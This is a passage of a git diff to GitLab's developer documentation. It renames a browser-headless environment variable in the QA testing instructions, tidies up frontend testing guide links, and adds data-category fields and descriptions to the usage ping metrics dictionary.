https://[YOUR-PORT].qa-tunnel.gitlab.info/ -- qa/specs/features/browser_ui/8_monitor/all_monitor_core_features_spec.rb --tag kubernetes --tag orchestrated --tag requires_admin ``` The following includes more information on the command: -`QA_DEBUG` - Set to `true` to verbosely log page object actions. --`CHROME_HEADLESS` - When running locally, set to `false` to allow Chrome tests to be visible - watch your tests being run. +-`WEBDRIVER_HEADLESS` - When running locally, set to `false` to allow browser tests to be visible - watch your tests being run. -`GITLAB_ADMIN_USERNAME` - Admin username to use when adding a license. -`GITLAB_ADMIN_PASSWORD` - Admin password to use when adding a license. -`GITLAB_QA_ACCESS_TOKEN` and `GITLAB_QA_ADMIN_ACCESS_TOKEN` - A valid personal access token with the `api` scope. This is used for API access during tests, and is used in the version that staging is currently running. The `ADMIN_ACCESS_TOKEN` is from a user with admin access. Used for API access as an admin during tests. @@ -279,7 +279,7 @@ Geo end-to-end tests can run locally against a [Geo GDK setup](https://gitlab.co Run from the [`qa/` directory](https://gitlab.com/gitlab-org/gitlab/-/blob/f7272b77e80215c39d1ffeaed27794c220dbe03f/qa) with both GDK Geo primary and Geo secondary instances running: ```shell -CHROME_HEADLESS=false bundle exec bin/qa QA::EE::Scenario::Test::Geo --primary-address http://localhost:3001 --secondary-address http://localhost:3002 --without-setup +WEBDRIVER_HEADLESS=false bundle exec bin/qa QA::EE::Scenario::Test::Geo --primary-address http://localhost:3001 --secondary-address http://localhost:3002 --without-setup ``` ### Using Geo in Docker @@ -455,7 +455,7 @@ To run the LDAP tests on your local with TLS enabled, follow these steps: 1. Run an LDAP test from [`gitlab/qa`](https://gitlab.com/gitlab-org/gitlab/-/tree/d5447ebb5f99d4c72780681ddf4dc25b0738acba/qa) directory: ```shell - GITLAB_LDAP_USERNAME="tanuki" GITLAB_LDAP_PASSWORD="password" QA_DEBUG=true CHROME_HEADLESS=false bin/qa Test::Instance::All https://gitlab.test qa/specs/features/browser_ui/1_manage/login/log_into_gitlab_via_ldap_spec.rb + GITLAB_LDAP_USERNAME="tanuki" GITLAB_LDAP_PASSWORD="password" QA_DEBUG=true WEBDRIVER_HEADLESS=false bin/qa Test::Instance::All https://gitlab.test qa/specs/features/browser_ui/1_manage/login/log_into_gitlab_via_ldap_spec.rb ``` ### Running LDAP tests with TLS disabled @@ -483,5 +483,5 @@ To run the LDAP tests on your local with TLS disabled, follow these steps: 1. Run an LDAP test from [`gitlab/qa`](https://gitlab.com/gitlab-org/gitlab/-/tree/d5447ebb5f99d4c72780681ddf4dc25b0738acba/qa) directory: ```shell - GITLAB_LDAP_USERNAME="tanuki" GITLAB_LDAP_PASSWORD="password" QA_DEBUG=true CHROME_HEADLESS=false bin/qa Test::Instance::All http://localhost qa/specs/features/browser_ui/1_manage/login/log_into_gitlab_via_ldap_spec.rb + GITLAB_LDAP_USERNAME="tanuki" GITLAB_LDAP_PASSWORD="password" QA_DEBUG=true WEBDRIVER_HEADLESS=false bin/qa Test::Instance::All http://localhost qa/specs/features/browser_ui/1_manage/login/log_into_gitlab_via_ldap_spec.rb ``` diff --git a/doc/development/testing_guide/frontend_testing.md b/doc/development/testing_guide/frontend_testing.md index 8573fa81718..d8f3a18577f 100644 --- a/doc/development/testing_guide/frontend_testing.md +++ b/doc/development/testing_guide/frontend_testing.md @@ -221,8 +221,8 @@ When it comes to querying DOM elements in your tests, it is best to uniquely and the element. Preferentially, this is done by targeting what the user actually sees using [DOM Testing Library](https://testing-library.com/docs/dom-testing-library/intro/). -When selecting by text it is best to use the [`byRole`](https://testing-library.com/docs/queries/byrole) query -as it helps enforce accessibility best practices. `findByRole` and the other [DOM Testing Library queries](https://testing-library.com/docs/queries/about) are available when using [`shallowMountExtended` or `mountExtended`](#shallowmountextended-and-mountextended). +When selecting by text it is best to use the [`byRole`](https://testing-library.com/docs/queries/byrole/) query +as it helps enforce accessibility best practices. `findByRole` and the other [DOM Testing Library queries](https://testing-library.com/docs/queries/about/) are available when using [`shallowMountExtended` or `mountExtended`](#shallowmountextended-and-mountextended). When writing Vue component unit tests, it can be wise to query children by component, so that the unit test can focus on comprehensive value coverage rather than dealing with the complexity of a child component's behavior. @@ -891,14 +891,13 @@ describe GraphQL::Query, type: :request do include GraphqlHelpers all_releases_query_path = 'releases/graphql/queries/all_releases.query.graphql' - fragment_paths = ['releases/graphql/fragments/release.fragment.graphql'] before(:all) do clean_frontend_fixtures('graphql/releases/') end it "graphql/#{all_releases_query_path}.json" do - query = get_graphql_query_as_string(all_releases_query_path, fragment_paths) + query = get_graphql_query_as_string(all_releases_query_path) post_graphql(query, current_user: admin, variables: { fullPath: project.full_path }) @@ -910,10 +909,6 @@ end This will create a new fixture located at `tmp/tests/frontend/fixtures-ee/graphql/releases/graphql/queries/all_releases.query.graphql.json`. -You will need to provide the paths to all fragments used by the query. -`get_graphql_query_as_string` reads all of the provided file paths and returns -the result as a single, concatenated string. - You can import the JSON fixture in a Jest test using the `getJSONFixture` method [as described below](#use-fixtures). @@ -1152,7 +1147,7 @@ Both functions run `callback` on the next tick after the requests finish (using ### `shallowMountExtended` and `mountExtended` The `shallowMountExtended` and `mountExtended` utilities provide you with the ability to perform -any of the available [DOM Testing Library queries](https://testing-library.com/docs/queries/about) +any of the available [DOM Testing Library queries](https://testing-library.com/docs/queries/about/) by prefixing them with `find` or `findAll`. ```javascript diff --git a/doc/development/testing_guide/index.md b/doc/development/testing_guide/index.md index c22a4e0b3ad..889dc45d6e3 100644 --- a/doc/development/testing_guide/index.md +++ b/doc/development/testing_guide/index.md @@ -70,4 +70,4 @@ Everything you should know about how to run end-to-end tests using Everything you should know about how to test migrations. -[Return to Development documentation](../README.md) +[Return to Development documentation](../index.md) diff --git a/doc/development/understanding_explain_plans.md b/doc/development/understanding_explain_plans.md index f9d1e7e2eee..c3fefd40171 100644 --- a/doc/development/understanding_explain_plans.md +++ b/doc/development/understanding_explain_plans.md @@ -825,3 +825,5 @@ For more information about the available options, run: A more extensive guide on understanding query plans can be found in the [presentation](https://public.dalibo.com/exports/conferences/_archives/_2012/201211_explain/understanding_explain.pdf) from [Dalibo.org](https://www.dalibo.com/en/). + +Depesz's blog also has a good [section](https://www.depesz.com/tag/unexplainable) dedicated to query plans. diff --git a/doc/development/usage_ping.md b/doc/development/usage_ping.md deleted file mode 100644 index 567a2d41c33..00000000000 --- a/doc/development/usage_ping.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'usage_ping/index.md' -remove_date: '2021-05-23' ---- - -This document was moved to [another location](usage_ping/index.md). - -<!-- This redirect file can be deleted after <2021-05-23>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page -->
\ No newline at end of file diff --git a/doc/development/usage_ping/dictionary.md b/doc/development/usage_ping/dictionary.md index e76fb302b9c..934bdf9c808 100644 --- a/doc/development/usage_ping/dictionary.md +++ b/doc/development/usage_ping/dictionary.md @@ -42,6 +42,8 @@ The number of active users existing in the instance. This is named the instance_ Group: `group::product intelligence` +Data Category: `Subscription` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -54,6 +56,8 @@ Unique visitors to any analytics feature by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -66,6 +70,8 @@ Unique visitors to any analytics feature by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -78,6 +84,8 @@ Unique visitors to /groups/:group/-/contribution_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -90,6 +98,8 @@ Unique visitors to /groups/:group/-/insights Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -102,6 +112,8 @@ Unique visitors to /groups/:group/-/issues_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -114,6 +126,8 @@ Unique visitors to /groups/:group/-/analytics/merge_request_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `removed` Tiers: `free` @@ -126,6 +140,8 @@ Unique visitors to /groups/:group/-/analytics/productivity_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -138,6 +154,8 @@ Unique visitors to /groups/:group/-/analytics/value_stream_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -150,6 +168,8 @@ Unique visitors to /-/instance_statistics/cohorts Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -162,6 +182,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -174,6 +196,8 @@ Unique visitors to /-/instance_statistics/dev_ops_score Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -186,6 +210,8 @@ Unique visitors to/admin/usage_trends Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -198,6 +224,8 @@ Unique visitors to /:group/:project/-/analytics/code_reviews Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -210,6 +238,8 @@ Unique visitors to /:group/:project/insights Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -222,6 +252,8 @@ Unique visitors to /:group/:project/-/analytics/issues_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -234,6 +266,8 @@ Unique visitors to /:group/:project/-/analytics/merge_request_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -246,6 +280,8 @@ Unique visitors to /:group/:project/pipelines/charts Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -258,6 +294,8 @@ Unique visitors to /:group/:project/-/graphs/master/charts Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -270,6 +308,8 @@ Unique visitors to /:group/:project/-/value_stream_analytics Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -282,93 +322,109 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `compliance_unique_visits.a_compliance_audit_events_api` -Missing description +Unique users that have used the Audit Events API. -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183912_a_compliance_audit_events_api.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183912_a_compliance_audit_events_api.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `compliance_unique_visits.compliance_unique_visits_for_any_target` -Missing description +Number of unique visits to any compliance page -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183914_compliance_unique_visits_for_any_target.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183914_compliance_unique_visits_for_any_target.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `compliance_unique_visits.compliance_unique_visits_for_any_target_monthly` -Missing description +Number of unique visits to any compliance page over a given month -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183916_compliance_unique_visits_for_any_target_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183916_compliance_unique_visits_for_any_target_monthly.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `compliance_unique_visits.g_compliance_audit_events` -Missing description +Unique users who have viewed audit events -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183906_g_compliance_audit_events.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183906_g_compliance_audit_events.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `compliance_unique_visits.g_compliance_dashboard` -Missing description +Number of unique visitors to the compliance dashboard. -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183904_g_compliance_dashboard.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183904_g_compliance_dashboard.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `compliance_unique_visits.i_compliance_audit_events` -Missing description +Unique users that have viewed the instance-level audit events screen -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183908_i_compliance_audit_events.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183908_i_compliance_audit_events.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `compliance_unique_visits.i_compliance_credential_inventory` -Missing description +Unique users who have viewed the credential inventory -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183910_i_compliance_credential_inventory.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183910_i_compliance_credential_inventory.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `ultimate` ### `container_registry_enabled` @@ -378,6 +434,8 @@ A count of projects where the container registry is enabled Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -390,6 +448,8 @@ Identifies if a user is using an external container registry and what type Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -402,6 +462,8 @@ Identifies the version of the external registry being used Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -412,7 +474,9 @@ Count of issues created by the alert bot automatically [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180449_alert_bot_incident_issues.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -426,6 +490,8 @@ Total Searches for All Basic Search and Advanced Search in self-managed and SaaS Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -438,6 +504,8 @@ Count of API Fuzzing `docker-in-docker` jobs run by job name Group: `group::fuzz testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -450,6 +518,8 @@ Count of API Fuzzing jobs run by job name Group: `group::fuzz testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -462,6 +532,8 @@ Count of assignee lists created on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -474,6 +546,8 @@ Projects with Auto DevOps template disabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -486,6 +560,8 @@ Projects with Auto DevOps template enabled (excluding implicit Auto DevOps enabl Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -498,6 +574,8 @@ Count of Boards created Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -510,6 +588,8 @@ Unique builds in project Group: `group::pipeline execution` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -522,6 +602,8 @@ Total pipelines in external repositories Group: `group::pipeline execution` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -534,6 +616,8 @@ Total pipelines in GitLab repositories Group: `group::pipeline execution` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -546,6 +630,8 @@ Total pipelines from an Auto DevOps template Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -558,6 +644,8 @@ Total Pipelines from templates in repository Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -570,102 +658,120 @@ Pipeline schedules in GitLab Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners` -Total configured Runners in project +Total configured Runners of all types [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175520_ci_runners.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners_group_type_active` -Total active instance Runners +Total active Group Runners [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502050341_ci_runners_group_type_active.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners_group_type_active_online` -Total active and online group Runners +Total active and online Group Runners [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502051922_ci_runners_group_type_active_online.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners_instance_type_active` -Total active group Runners +Total active Shared (Instance) Runners [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502045402_ci_runners_instance_type_active.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners_instance_type_active_online` -Total active and online instance Runners +Total active and online Shared (Instance) Runners [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502051651_ci_runners_instance_type_active_online.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners_online` -Total online Runners +Total online Runners of all types [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502050942_ci_runners_online.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners_project_type_active` -Total active project Runners +Total active Specific (Project) Runners [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502050834_ci_runners_project_type_active.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.ci_runners_project_type_active_online` -Total active and online project Runners +Total active and online Specific (Project) Runners [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502052036_ci_runners_project_type_active_online.yml) Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -678,6 +784,8 @@ Total configured Triggers in project Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -690,6 +798,8 @@ Total GitLab Managed clusters both enabled and disabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -702,6 +812,8 @@ Total GitLab Managed clusters with GitLab Managed App:Cert Manager installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -714,6 +826,8 @@ Total GitLab Managed clusters with GitLab Managed App:Cilium installed Group: `group::configure` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -726,6 +840,8 @@ Total GitLab Managed clusters with GitLab Managed App:Crossplane installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -738,6 +854,8 @@ Total GitLab Managed clusters with GitLab Managed App:Elastic Stack installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -750,6 +868,8 @@ Total GitLab Managed clusters with GitLab Managed App:Helm enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -762,6 +882,8 @@ Total GitLab Managed clusters with GitLab Managed App:Ingress installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -774,6 +896,8 @@ Total GitLab Managed clusters with GitLab Managed App:Jupyter installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -786,6 +910,8 @@ Total GitLab Managed clusters with GitLab Managed App:Knative installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -798,6 +924,8 @@ Total GitLab Managed clusters with GitLab Managed App:Prometheus installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -810,6 +938,8 @@ Total GitLab Managed clusters with GitLab Managed App:Runner installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -822,6 +952,8 @@ Number of Kubernetes clusters attached to GitLab currently disabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -834,6 +966,8 @@ Number of Kubernetes clusters attached to GitLab currently enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -846,6 +980,8 @@ Total GitLab Managed clusters with defined cluster management project Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -858,6 +994,8 @@ Total GitLab Managed clusters provisioned with GitLab on AWS EKS Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -870,6 +1008,8 @@ Total GitLab Managed clusters provisioned with GitLab on GCE GKE Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -882,6 +1022,8 @@ Total GitLab Managed clusters that are user provisioned Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -894,6 +1036,8 @@ Count of total unique commit comments. Does not include MR diff comments Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -906,6 +1050,8 @@ Count of confidential epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -918,6 +1064,8 @@ Count of Container Scanning jobs run Group: `group::container security` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -930,6 +1078,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -942,6 +1092,8 @@ Total visits to VSA (both group- and project-level) all time Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -954,6 +1106,8 @@ Count of DAST jobs run Group: `group::dynamic analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -966,6 +1120,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -978,6 +1134,8 @@ Count to Dependency List page views Group: `group::composition analysis` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -990,6 +1148,8 @@ Count of Dependency Scanning jobs run Group: `group::composition analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -1002,6 +1162,8 @@ Missing description Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -1014,6 +1176,8 @@ Total deployments count Group: `group::ops release` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1026,6 +1190,8 @@ Number of designs that were created Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1038,6 +1204,8 @@ Number of designs that were deleted Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1050,6 +1218,8 @@ Number of updates to designs Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1062,6 +1232,8 @@ Total available and stopped environments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -1074,6 +1246,8 @@ Count of issues that are assigned to an epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -1086,6 +1260,8 @@ Count of all epics Group: `group::product planning` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -1098,6 +1274,8 @@ Count of the deepest relationship level for epics Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -1110,6 +1288,8 @@ Total failed deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -1122,6 +1302,8 @@ Number of feature flag toggles Group: `group::progressive delivery` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -1134,6 +1316,8 @@ Number of replication events on a Geo primary Group: `group::geo` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -1146,6 +1330,8 @@ Total number of sites in a Geo deployment Group: `group::geo` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -1158,6 +1344,8 @@ Total Grafana integrations attached to projects Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -1170,6 +1358,8 @@ Total GitLab Managed disabled clusters previously attached to groups Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1182,6 +1372,8 @@ Total GitLab Managed clusters attached to groups Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1194,6 +1386,8 @@ Total count of groups as of usage ping snapshot Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1206,6 +1400,8 @@ Count of groups with active integrations for Asana Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1218,6 +1414,8 @@ Count of groups with active integrations for Assembla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1230,6 +1428,8 @@ Count of groups with active integrations for Bamboo CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1242,6 +1442,8 @@ Count of groups with active integrations for Bugzilla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1254,6 +1456,8 @@ Count of groups with active integrations for Buildkite Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1266,6 +1470,8 @@ Count of groups with active integrations for Campfire Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1278,6 +1484,8 @@ Count of groups with active integrations for Confluence Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1290,6 +1498,8 @@ Count of groups with active integrations for a Custom Issue Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1302,6 +1512,8 @@ Count of groups with active integrations for Datadog Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1314,6 +1526,8 @@ Count of groups with active integrations for Discord Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1326,6 +1540,8 @@ Count of groups with active integrations for Drone CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1338,6 +1554,8 @@ Count of groups with active integrations for Emails on Push Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1350,6 +1568,8 @@ Count of groups with active integrations for EWM Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1362,6 +1582,8 @@ Count of groups with active integrations for External Wiki Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1374,6 +1596,8 @@ Count of groups with active integrations for Flowdock Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1386,6 +1610,8 @@ Count of groups with active integrations for GitHub Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -1398,6 +1624,8 @@ Count of groups with active integrations for Hangouts Chat Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1410,6 +1638,8 @@ Count of groups with active integrations for HipChat Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -1422,6 +1652,8 @@ Count of active groups inheriting integrations for Asana Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1434,6 +1666,8 @@ Count of active groups inheriting integrations for Assembla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1446,6 +1680,8 @@ Count of active groups inheriting integrations for Bamboo CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1458,6 +1694,8 @@ Count of active groups inheriting integrations for Bugzilla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1470,6 +1708,8 @@ Count of active groups inheriting integrations for Buildkite Group: `group::ecosystem` +Data Category: 